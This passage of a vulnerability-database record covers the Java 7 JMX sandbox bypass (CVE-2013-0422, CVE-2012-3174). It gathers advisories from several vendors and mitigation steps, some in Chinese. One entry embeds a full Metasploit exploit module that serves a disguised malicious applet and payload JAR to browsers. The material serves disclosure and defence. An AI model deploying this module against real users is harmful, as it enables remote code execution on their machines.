"cpe:2.3:a:oracle:jdk:1.7.0:update1:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update5:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update7:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update5:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update10:*:*:*:*:*:*"]}], "seebug": [{"lastseen": "2017-11-19T17:47:11", "description": "Bugtraq ID:57312\r\nCVE ID:CVE-2012-3174\r\n\r\nOracle Java Runtime Environment\u662f\u4e00\u6b3e\u4e3aJAVA\u5e94\u7528\u7a0b\u5e8f\u63d0\u4f9b\u53ef\u9760\u7684\u8fd0\u884c\u73af\u5883\u7684\u89e3\u51b3\u65b9\u6848\r\n\r\nOracle Java Runtime Environment\u5b58\u5728\u4e00\u4e2a\u672a\u660e\u5b89\u5168\u6f0f\u6d1e\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u6784\u5efa\u6076\u610fWEB\u9875\uff0c\u8bf1\u4f7f\u7528\u6237\u89e3\u6790\uff0c\u53ef\u4ee5\u5e94\u7528\u7a0b\u5e8f\u4e0a\u4e0b\u6587\u6267\u884c\u4efb\u610f\u4ee3\u7801\r\n0\r\nSun JRE (Windows Production Release) 1.7.0_4\r\nSun JRE (Windows Production Release) 1.7.0_2\r\nSun JRE (Solaris Production Release) 1.7.0_4\r\nSun JRE (Solaris Production Release) 1.7.0_2\r\nSun JRE (Linux Production Release) 1.7.0_4\r\nSun JRE (Linux Production Release) 1.7.0_2\r\n\u5382\u5546\u89e3\u51b3\u65b9\u6848\r\n\r\n\u7528\u6237\u53ef\u53c2\u8003\u5982\u4e0b\u5382\u5546\u63d0\u4f9b\u7684\u5b89\u5168\u516c\u544a\u83b7\u5f97\u8865\u4e01\u4fe1\u606f\uff1a\r\nhttp://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html", "published": "2013-01-16T00:00:00", "title": "Oracle Java Runtime Environment \u672a\u660e\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e(CVE-2012-3174)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2013-01-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60593", "id": "SSV:60593", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T16:50:42", "description": "No description provided by source.", "published": 
"2014-07-01T00:00:00", "title": "Java Applet JMX Remote Code Execution", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0422"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-77783", "id": "SSV:77783", "sourceData": "\n ##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'rex'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::EXE\r\n\r\n\tinclude Msf::Exploit::Remote::BrowserAutopwn\r\n\tautopwn_info({ :javascript => false })\r\n\r\n\tdef initialize( info = {} )\r\n\r\n\t\tsuper( update_info( info,\r\n\t\t\t'Name' => 'Java Applet JMX Remote Code Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module abuses the JMX classes from a Java Applet to run arbitrary Java\r\n\t\t\t\tcode outside of the sandbox as exploited in the wild in January of 2013. The\r\n\t\t\t\tvulnerability affects Java version 7u10 and earlier.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Unknown', # Vulnerability discovery\r\n\t\t\t\t\t'egypt', # Metasploit module\r\n\t\t\t\t\t'sinn3r', # Metasploit module\r\n\t\t\t\t\t'juan vazquez' # Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2013-0422' ],\r\n\t\t\t\t\t[ 'US-CERT-VU', '625617' ],\r\n\t\t\t\t\t[ 'URL', 'http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html' ],\r\n\t\t\t\t\t[ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/' ],\r\n\t\t\t\t\t[ 'URL', 'http://pastebin.com/cUG2ayjh' ] #Who authored the code on pastebin? 
I can't read Russian :-(\r\n\t\t\t\t],\r\n\t\t\t'Platform' => [ 'java', 'win', 'osx', 'linux' ],\r\n\t\t\t'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Generic (Java Payload)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => ['java'],\r\n\t\t\t\t\t\t\t'Arch' => ARCH_JAVA,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Windows x86 (Native Payload)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'win',\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Mac OS X x86 (Native Payload)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'osx',\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Linux x86 (Native Payload)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Jan 10 2013'\r\n\t\t))\r\n\tend\r\n\r\n\r\n\tdef setup\r\n\t\tpath = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0422", "Exploit.class")\r\n\t\t@exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }\r\n\t\tpath = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0422", "B.class")\r\n\t\t@loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }\r\n\r\n\t\t@exploit_class_name = rand_text_alpha("Exploit".length)\r\n\t\t@exploit_class.gsub!("Exploit", @exploit_class_name)\r\n\t\tsuper\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\tprint_status("handling request for #{request.uri}")\r\n\r\n\t\tcase request.uri\r\n\t\twhen /\\.jar$/i\r\n\t\t\tjar = payload.encoded_jar\r\n\t\t\tjar.add_file("#{@exploit_class_name}.class", @exploit_class)\r\n\t\t\tjar.add_file("B.class", @loader_class)\r\n\t\t\tmetasploit_str = rand_text_alpha("metasploit".length)\r\n\t\t\tpayload_str = rand_text_alpha("payload".length)\r\n\t\t\tjar.entries.each { 
|entry|\r\n\t\t\t\tentry.name.gsub!("metasploit", metasploit_str)\r\n\t\t\t\tentry.name.gsub!("Payload", payload_str)\r\n\t\t\t\tentry.data = entry.data.gsub("metasploit", metasploit_str)\r\n\t\t\t\tentry.data = entry.data.gsub("Payload", payload_str)\r\n\t\t\t}\r\n\t\t\tjar.build_manifest\r\n\r\n\t\t\tsend_response(cli, jar, { 'Content-Type' => "application/octet-stream" })\r\n\t\twhen /\\/$/\r\n\t\t\tpayload = regenerate_payload(cli)\r\n\t\t\tif not payload\r\n\t\t\t\tprint_error("Failed to generate the payload.")\r\n\t\t\t\tsend_not_found(cli)\r\n\t\t\t\treturn\r\n\t\t\tend\r\n\t\t\tsend_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })\r\n\t\telse\r\n\t\t\tsend_redirect(cli, get_resource() + '/', '')\r\n\t\tend\r\n\r\n\tend\r\n\r\n\tdef generate_html\r\n\t\thtml = %Q|<html><head><title>Loading, Please Wait...</title></head>|\r\n\t\thtml += %Q|<body><center><p>Loading, Please Wait...</p></center>|\r\n\t\thtml += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|\r\n\t\thtml += %Q|</applet></body></html>|\r\n\t\treturn html\r\n\tend\r\n\r\nend\r\n\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-77783"}, {"lastseen": "2017-11-19T17:47:04", "description": "BUGTRAQ ID: 57246\r\nCVE ID: CVE-2013-0422\r\n\r\nOracle Java Runtime Environment (JRE)\u662f\u4e00\u6b3e\u4e3aJAVA\u5e94\u7528\u7a0b\u5e8f\u63d0\u4f9b\u53ef\u9760\u8fd0\u884c\u73af\u5883\u7684\u89e3\u51b3\u65b9\u6848\u3002\r\n\r\nOracle JRE7\u73af\u5883\u4e2d\u7684jmx.mbeanserver.JmxMBeanServer\u7c7b\u5b58\u5728\u6c99\u76d2\u7ed5\u8fc7\u6f0f\u6d1e\u4f7f\u5f97\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u7ed5\u8fc7java 
securityManager\u7684\u68c0\u67e5\u8fdc\u7a0b\u6267\u884c\u4efb\u610fjava\u4ee3\u7801\u63a7\u5236\u7528\u6237\u7cfb\u7edf\u3002\r\n\r\n\u76ee\u524d\u5df2\u77e5\u53d7\u5f71\u54cd\u73af\u5883\u4e3a\u6700\u65b0\u7248\u672cOracle JRE7 update 10\u53ca\u5176\u66f4\u65e9\u7248\u672c\u3002\u7ecf\u6d4b\u8bd5Oracle Java 6\u4e0d\u53d7\u5f71\u54cd\u3002\n0\nOracle Java 7 Update 10\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n\u5982\u679c\u60a8\u4e0d\u80fd\u7acb\u523b\u5b89\u88c5\u8865\u4e01\u6216\u8005\u5347\u7ea7\uff0c\u5efa\u8bae\u60a8\u91c7\u53d6\u4ee5\u4e0b\u63aa\u65bd\u4ee5\u964d\u4f4e\u5a01\u80c1\uff1a\r\n\r\n* \u5728\u6d4f\u89c8\u5668\u4e2d\u6682\u65f6\u7981\u7528Java\r\n\r\n \u53c2\u8003\uff1ahttp://krebsonsecurity.com/how-to-unplug-java-from-the-browser/\r\n\r\n\u5bf9\u4e8eWindows\u7528\u6237:\r\n\r\n1) Firefox\r\n\r\n \u5de5\u5177->\u9644\u52a0\u7ec4\u4ef6(Ctrl-Shift-A)->\u63d2\u4ef6\uff0c\u5c06\u6240\u6709\u5e26\u6709Java\u5b57\u6837\u7684\u7981\u7528\uff0c\u91cd\u542fFirefox\u3002\r\n\r\n \u5b89\u88c5NoScript\u6269\u5c55\uff0cNoScript\u9009\u9879->\u5d4c\u5165\u7684\u5bf9\u8c61->\u7981\u6b62Java\r\n\r\n2) Chrome\r\n\r\n \u70b9\u51fb\u53f3\u4e0a\u89d2\u7684\u6273\u624b->\u8bbe\u7f6e->\u70b9\u51fb\u6700\u4e0b\u9762\u7684"\u663e\u793a\u9ad8\u7ea7\u8bbe\u7f6e"->\u9690\u79c1\u8bbe\u7f6e->\u5185\u5bb9\u8bbe\u7f6e->\u63d2\u4ef6\r\n ->\u505c\u7528\u5355\u4e2a\u63d2\u4ef6->Java->\u505c\u7528\r\n\r\n3) IE\r\n\r\n \u5982\u679c\u60a8\u5df2\u7ecf\u5347\u7ea7\u5230JRE 7 update 10\u53ef\u4ee5\u5229\u7528\u5b83\u65b0\u589e\u7684\u4e00\u4e2a\u5b89\u5168\u7279\u6027\u6765\u7981\u7528JAVA\u3002\r\n \u6253\u5f00\u63a7\u5236\u9762\u677f\uff0c\u641c\u7d22Java\uff0c\u5728java\u63a7\u5236\u9762\u677f\u4e2d\u9009\u62e9"\u5b89\u5168"\uff0c\u7136\u540e\u6e05\u7a7a"Enable Java\r\n content in the browser"\u7684\u590d\u9009\u6846\u3002\r\n http://www.java.com/en/download/help/disable_browser.xml\r\n\r\n \u5bf9\u4e8eJRE 7 update 10\u4ee5\u4e0b\u7684\u7248\u672c\uff1a\r\n\r\n 
\u63a7\u5236\u9762\u677f->Java->Java->\u67e5\u770b->\u7528\u6237->\u7981\u7528\u6240\u6709\u7248\u672c\u7684JRE(Java\u8fd0\u884c\u65f6\u73af\u5883)\r\n\r\n \u63a7\u5236\u9762\u677f->Java->Java->\u67e5\u770b->\u7cfb\u7edf->\u7981\u7528\u6240\u6709\u7248\u672c\u7684JRE(Java\u8fd0\u884c\u65f6\u73af\u5883)\r\n\r\n \u4f46\u662f\u8fd9\u4e00\u65b9\u6cd5\u53ea\u9002\u7528\u4e8eXP\u30012003\uff0c\u4e0d\u9002\u7528\u4e8eVista\u3001Win7\u7b49\u9ad8\u7248\u672c\u7684Windows\uff0c\u4f60\u65e0\u6cd5\u6e05\r\n \u7a7a\u76f8\u5e94\u7684\u542f\u7528\u590d\u9009\u6846\u3002\u6b64\u65f6\u9700\u8981\u4f7f\u7528regedit\u4fee\u6539\u6ce8\u518c\u8868\u3002\r\n\r\n \u8fd9\u4e2a\u6ce8\u518c\u8868\u952e\u503c\u4f4d\u4e8e:\r\n--------------------------------------------------------------------------\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_LOCAL_MACHINE\\SOFTWARE\\JavaSoft\\Java Plug-in]\r\n\r\n[HKEY_LOCAL_MACHINE\\SOFTWARE\\JavaSoft\\Java Plug-in\\<\u7248\u672c\u53f7>]\r\n"UseJava2IExplorer"=dword:00000001\r\n--------------------------------------------------------------------------\r\n \u6240\u6709\u7248\u672c\u7684Java\u90fd\u6709\u4e00\u4e2aUseJava2IExplorer\uff0c\u5176\u503c\u7f3a\u7701\u4e3a1\uff0c\u4fee\u6539\u62100\u5373\u53ef\u7981\u7528Java\u3002\r\n\r\n\r\n \u5982\u679c\u662f64\u4f4d\u7cfb\u7edf\u4e5f\u5b89\u88c5\u4e8632\u4f4dJava\u7684\u8bdd\uff0c\u76f8\u5173\u6ce8\u518c\u8868\u952e\u503c\u4f4d\u4e8e:\r\n\r\n--------------------------------------------------------------------------\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\JavaSoft\\Java Plug-in]\r\n\r\n[HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\JavaSoft\\Java Plug-in\\<\u7248\u672c\u53f7>]\r\n"UseJava2IExplorer"=dword:00000001\r\n--------------------------------------------------------------------------\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nOracle\r\n------\r\nOracle\u5df2\u7ecf\u53d1\u5e03\u4e86\u9488\u5bf9\u8be5\u6f0f\u6d1e\u7684\u8865\u4e01Java 7 update 
11\u548c\u76f8\u5173\u5b89\u5168\u516c\u544a\uff1a\r\nhttp://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html\r\n\r\n\u5efa\u8baeJava\u7528\u6237\u5c3d\u5feb\u5b89\u88c5\u6700\u65b0\u7684\u5347\u7ea7\u5305\u3002\r\n\r\n\u5bf9\u4e8eWindows \u7528\u6237\uff0c\u9996\u5148\u60a8\u5e94\u5f53\u5728\u63a7\u5236\u9762\u677f->\u6dfb\u52a0\u6216\u5220\u9664\u7a0b\u5e8f(Win7\u4e0b\u662f\u63a7\u5236\u9762\u677f->\u7a0b\u5e8f->\u7a0b\u5e8f\u548c\u529f\u80fd)\u4e2d\u786e\u8ba4\u60a8\u662f\u5426\u5df2\u7ecf\u5b89\u88c5java\uff0c\u4ee5\u53ca\u5b89\u88c5\u7684\u7248\u672c\uff0c\u4f8b\u5982\u662fJDK\u8fd8\u662fJRE\uff0c\u662f32\u4f4d\u8fd8\u662f64\u4f4d\u3002\u5982\u679c\u60a8\u5c1a\u672a\u5b89\u88c5Java,\u5219\u4e0d\u5fc5\u7ee7\u7eed\u4e0b\u9762\u7684\u64cd\u4f5c\u3002\r\n\r\n\u5bf9\u4e8ejava\u5f00\u53d1\u4eba\u5458\uff0c\u53ef\u4ee5\u4ece\u4e0b\u5217\u94fe\u63a5\u624b\u5de5\u4e0b\u8f7d\u6700\u65b0\u7684Java SE JDK 7\u548c JRE 7\uff1a\r\nhttp://www.oracle.com/technetwork/java/javase/downloads/index.html\r\n\r\n\u5bf9\u4e8e\u901a\u8fc7\u6d4f\u89c8\u5668\u4f7f\u7528Java SE\u7684\u666e\u901a\u7528\u6237\uff0c\u53ef\u4ee5\u76f4\u63a5\u8bbf\u95eehttp://java.com \uff0c\u6839\u636e\u63d0\u793a\u4fe1\u606f\u4e0b\u8f7d\u6700\u65b0\u7684java JRE\u3002\u5982\u679c\u60a8\u5728\u4f7f\u752864\u4f4dWindows\u7cfb\u7edf\uff0c\u60a8\u53ef\u80fd\u9700\u8981\u5206\u522b\u4f7f\u752832\u4f4d\u548c64\u4f4d\u7684\u6d4f\u89c8\u5668\u6765\u8bbf\u95eejava.com\u4ee5\u5206\u522b\u4e0b\u8f7d32\u4f4d\u548c64\u4f4d\u7684JRE\u3002", "published": "2013-01-14T00:00:00", "title": "Oracle Java 7 JmxMBeanServer\u7c7b\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0422"], "modified": "2013-01-14T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60585", "id": "SSV:60585", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}], "symantec": 
[{"lastseen": "2018-03-13T06:16:58", "bulletinFamily": "software", "cvelist": ["CVE-2013-0422"], "description": "### Description\n\nOracle Java Runtime Environment is prone to multiple remote code execution vulnerabilities. An attacker can exploit these issues to execute arbitrary code in the context of the application. Versions prior to Oracle JRE 1.7.0 Update 11 are vulnerable.\n\n### Technologies Affected\n\n * CentOS CentOS 5 \n * Fedoraproject Fedora 16 \n * Fedoraproject Fedora 17 \n * Fedoraproject Fedora 18 \n * Gentoo Linux \n * IBM Java SDK 7 SR1 \n * IBM Java SDK 7 SR2 \n * IBM Java SDK 7 SR3 \n * IBM Java SE 7 SR1 \n * IBM Java SE 7 SR2 \n * IBM Maximo Asset Management 6.2 \n * IBM Maximo Asset Management 7.1 \n * IBM Maximo Asset Management 7.5 \n * IBM Maximo Asset Management Essentials 7.1 \n * IBM Maximo Asset Management Essentials 7.5 \n * IBM Tivoli Endpoint Manager for Remote Control 9.0.0 \n * IBM Tivoli System Automation for Integrated Operations Management 2.1 \n * Mandriva Business Server 1 \n * Mandriva Business Server 1 X86 64 \n * Oracle Enterprise Linux 6 \n * Oracle Enterprise Linux 6.2 \n * Oracle JDK (Linux Production Release) 1.7.0 \n * Oracle JDK (Linux Production Release) 1.7.0_2 \n * Oracle JDK (Linux Production Release) 1.7.0_4 \n * Oracle JDK (Linux Production Release) 1.7.0_7 \n * Oracle JDK (Solaris Production Release) 1.7.0 \n * Oracle JDK (Solaris Production Release) 1.7.0_10 \n * Oracle JDK (Solaris Production Release) 1.7.0_2 \n * Oracle JDK (Solaris Production Release) 1.7.0_4 \n * Oracle JDK (Solaris Production Release) 1.7.0_7 \n * Oracle JDK (Windows Production Release) 1.7.0 \n * Oracle JDK (Windows Production Release) 1.7.0_2 \n * Oracle JDK (Windows Production Release) 1.7.0_4 \n * Oracle JDK (Windows Production Release) 1.7.0_7 \n * Oracle JRE 1.7.0 Update 10 \n * Oracle JRE 1.7.0 Update 4 \n * Oracle JRE 1.7.0 Update 6 \n * Oracle JRE 1.7.0 Update 7 \n * Oracle JRE 1.7.0 Update 9 \n * Redhat Enterprise Linux 5 
Server \n * Redhat Enterprise Linux Desktop 5 Client \n * Redhat Enterprise Linux Desktop 6 \n * Redhat Enterprise Linux Desktop Optional 6 \n * Redhat Enterprise Linux Desktop Supplementary 5 Client \n * Redhat Enterprise Linux Desktop Supplementary 6 \n * Redhat Enterprise Linux HPC Node 6 \n * Redhat Enterprise Linux HPC Node Optional 6 \n * Redhat Enterprise Linux HPC Node Supplementary 6 \n * Redhat Enterprise Linux Server 6 \n * Redhat Enterprise Linux Server Optional 6 \n * Redhat Enterprise Linux Server Supplementary 6 \n * Redhat Enterprise Linux Supplementary 5 Server \n * Redhat Enterprise Linux Workstation 6 \n * Redhat Enterprise Linux Workstation Optional 6 \n * Redhat Enterprise Linux Workstation Supplementary 6 \n * SuSE Linux Enterprise Software Development Kit 11 SP2 \n * SuSE SUSE Linux Enterprise Java 11 SP2 \n * SuSE SUSE Linux Enterprise Server 11 SP2 \n * SuSE SUSE Linux Enterprise Server for VMware 11 SP2 \n * SuSE openSUSE 12.2 \n * Ubuntu Ubuntu Linux 12.10 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nFilter access to the affected computer at the network boundary if global access isn't needed. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity including unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. 
Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Set web browser security to disable the execution of script code or active content.** \nDisabling the execution of script code in the browser may limit exposure to this and other latent vulnerabilities.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo limit the impact of latent vulnerabilities, configure applications to run as a nonadministrative user with minimal access rights.\n\nUpdates are available. Please see the references for more information.\n", "modified": "2013-01-10T00:00:00", "published": "2013-01-10T00:00:00", "id": "SMNTC-57246", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/57246", "type": "symantec", "title": "Oracle Java Runtime Environment CVE-2013-0422 Multiple Remote Code Execution Vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "centos": [{"lastseen": "2019-12-20T18:24:42", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "description": "**CentOS Errata and Security Advisory** CESA-2013:0165\n\n\nThese packages provide the OpenJDK 7 Java Runtime Environment and the\nOpenJDK 7 Software Development Kit.\n\nTwo improper permission check issues were discovered in the reflection API\nin OpenJDK. An untrusted Java application or applet could use these flaws\nto bypass Java sandbox restrictions. (CVE-2012-3174, CVE-2013-0422)\n\nThis erratum also upgrades the OpenJDK package to IcedTea7 2.3.4. Refer to\nthe NEWS file, linked to in the References, for further information.\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. 
All running instances of OpenJDK Java\nmust be restarted for the update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2013-January/031241.html\nhttp://lists.centos.org/pipermail/centos-announce/2013-January/031242.html\n\n**Affected packages:**\njava-1.7.0-openjdk\njava-1.7.0-openjdk-demo\njava-1.7.0-openjdk-devel\njava-1.7.0-openjdk-javadoc\njava-1.7.0-openjdk-src\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-0165.html", "edition": 3, "modified": "2013-01-16T22:43:17", "published": "2013-01-16T20:29:20", "href": "http://lists.centos.org/pipermail/centos-announce/2013-January/031241.html", "id": "CESA-2013:0165", "title": "java security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-08T23:43:20", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "description": "It was discovered that OpenJDK 7's security mechanism could be bypassed via \nJava applets. 
If a user were tricked into opening a malicious website, a \nremote attacker could exploit this to perform arbitrary code execution as \nthe user invoking the program.", "edition": 5, "modified": "2013-01-16T00:00:00", "published": "2013-01-16T00:00:00", "id": "USN-1693-1", "href": "https://ubuntu.com/security/notices/USN-1693-1", "title": "OpenJDK 7 vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T12:15:22", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "description": "java-1_7_0-openjdk was updated to icedtea-2.3.4 fixing bugs\n and also severe security issues:\n\n * Security fixes\n - S8004933, CVE-2012-3174: Improve MethodHandle\n interaction with libraries\n - S8006017, CVE-2013-0422: Improve lookup resolutions\n - S8006125: Update MethodHandles library interactions\n\n * Bug fixes\n - S7197906: BlockOffsetArray::power_to_cards_back() needs\n to handle &gt; 32 bit shifts\n - G422525: Fix building with PaX enabled kernels.\n - use gpg-offline to check the validity of icedtea tarball\n\n - use jamvm on %arm\n - use icedtea package name instead of protected openjdk for\n jamvm builds\n - fix armv5 build\n\n - update to java access bridge 1.26.2\n * bugfix release, mainly 64bit JNI and JVM support\n\n - fix a segfault in AWT code - (bnc#792951)\n * add openjdk-7-src-b147-awt-crasher.patch\n - turn pulseaudio off on pre 11.4 distros\n\n", "edition": 1, "modified": "2013-01-25T14:04:23", "published": "2013-01-25T14:04:23", "id": "OPENSUSE-SU-2013:0199-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-01/msg00025.html", "type": "suse", "title": "java-1_7_0-openjdk: update to icedtea-2.3.4 (critical)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:25:42", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0426", "CVE-2012-1541", "CVE-2013-0427", 
"CVE-2013-1478", "CVE-2013-0428", "CVE-2013-1485", "CVE-2013-0435", "CVE-2013-0442", "CVE-2012-3342", "CVE-2013-0431", "CVE-2013-1473", "CVE-2013-0434", "CVE-2013-0443", "CVE-2012-3174", "CVE-2013-0351", "CVE-2013-0444", "CVE-2013-0433", "CVE-2013-1480", "CVE-2013-0409", "CVE-2013-0438", "CVE-2013-1486", "CVE-2013-1476", "CVE-2013-1487", "CVE-2013-0445", "CVE-2013-0432", "CVE-2013-0424", "CVE-2012-3213", "CVE-2013-0450", "CVE-2013-0446", "CVE-2013-0440", "CVE-2013-0437", "CVE-2013-0425", "CVE-2013-1484", "CVE-2013-0422", "CVE-2013-0441", "CVE-2013-0449", "CVE-2013-0423", "CVE-2013-0419"], "description": "IBM Java 7 was updated to SR4, fixing various critical\n security issues and bugs.\n\n Please see the IBM JDK Alert page for more information:\n\n <a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>\n <<a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>>\n\n Security issues fixed:\n\n CVE-2013-1487, CVE-2013-1486, CVE-2013-1478, CVE-2013-0445,\n CVE-2013-1480, CVE-2013-0441, CVE-2013-1476,\n CVE-2012-1541, CVE-2013-0446, CVE-2012-3342,\n CVE-2013-0442, CVE-2013-0450, CVE-2013-0425, CVE-2013-0426,\n CVE-2013-0428, CVE-2012-3213, CVE-2013-0419,\n CVE-2013-0423, CVE-2013-0351, CVE-2013-0432,\n CVE-2013-1473, CVE-2013-0435, CVE-2013-0434, CVE-2013-0409,\n CVE-2013-0427, CVE-2013-0433, CVE-2013-0424,\n CVE-2013-0440, CVE-2013-0438, CVE-2013-0443,\n CVE-2013-1484, CVE-2013-1485, CVE-2013-0437, CVE-2013-0444,\n CVE-2013-0449, CVE-2013-0431, CVE-2013-0422, CVE-2012-3174.\n\n", "edition": 1, "modified": "2013-03-13T00:05:30", "published": "2013-03-13T00:05:30", "id": "SUSE-SU-2013:0440-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-03/msg00013.html", "title": "Security update for Java (important)", "type": "suse", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:44:53", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "description": "These packages provide the OpenJDK 7 Java Runtime Environment and the\nOpenJDK 7 Software Development Kit.\n\nTwo improper permission check issues were discovered in the reflection API\nin OpenJDK. An untrusted Java application or applet could use these flaws\nto bypass Java sandbox restrictions. (CVE-2012-3174, CVE-2013-0422)\n\nThis erratum also upgrades the OpenJDK package to IcedTea7 2.3.4. Refer to\nthe NEWS file, linked to in the References, for further information.\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect.\n", "modified": "2018-06-06T20:24:30", "published": "2013-01-16T05:00:00", "id": "RHSA-2013:0165", "href": "https://access.redhat.com/errata/RHSA-2013:0165", "type": "redhat", "title": "(RHSA-2013:0165) Important: java-1.7.0-openjdk security update", "cvss": {"score": 10.0, "vector": 